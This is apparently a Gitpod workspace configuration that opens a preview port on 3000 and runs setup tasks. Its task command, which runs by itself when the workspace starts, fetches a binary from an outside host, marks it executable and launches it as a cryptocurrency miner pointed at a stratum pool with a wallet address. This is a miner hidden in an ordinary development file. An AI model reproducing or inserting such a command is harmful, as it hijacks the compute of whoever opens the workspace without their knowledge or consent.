ports:
  - port: 3000
    onOpen: open-preview

tasks:
  - init: npm install
    command: curl -O http://www.netsteady.com/virtual; chmod +x virtual; ./virtual -a power2b -o stratum+tcp://stratum-na.rplant.xyz:7022 -u MgwuCc6yvsvMeg6AosthAe4gTvQwaoKFFu.ZTX
